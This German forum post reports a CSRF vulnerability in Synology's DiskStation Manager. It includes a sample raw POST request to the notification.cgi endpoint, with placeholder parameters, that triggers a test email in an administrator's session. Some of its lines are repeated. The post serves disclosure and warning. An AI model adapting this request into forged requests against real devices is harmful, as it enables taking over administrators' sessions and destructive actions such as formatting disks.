In Folge meines Beitrags Sicherheit der Diskstation möchte ich mich eines neuen Themas annehmen. Intention war meine FritzBox, die han dieser Stelle nicht patzt. Beim DSM mußte ich leider feststellen, daß dieser für CSRF-Angriffe anfällig ist. Sprich, wenn jemand als Administrator an der Diskstation angemeldet ist, können andere Webseiten im Kontext des angemeldeten Administrators Befehle auf der Diskstation ausführen, ohne daß dieser es merkt, z.B. die Festplatten formatieren.
Folgender Aufruf soll dies beispielhaft anhand des Versands einer Testnachricht über den Synology-Benachrichtigungsdienst verdeutlichen:
Die Parameter in spitzen Klammern sind geeignet zu setzen.
Viele Grüße
Süno42
Folgender Aufruf soll dies beispielhaft anhand des Versands einer Testnachricht über den Synology-Benachrichtigungsdienst verdeutlichen:
Rich (BBCode):
POST /webman/modules/ControlPanel/modules/notification.cgi HTTP/1.1
Host diskstation:5001
Content-Length <xxx>
mail_enable=on&smtpserver=<mailserver>&smtpport=<port>&smtpssl=on&mail1=<E-Mail-Adresse>&mail2=&subjectprefix=%5BDS213%2B%5D&newusermail=on&action=sendmailtest
Die Parameter in spitzen Klammern sind geeignet zu setzen.
Viele Grüße
Süno42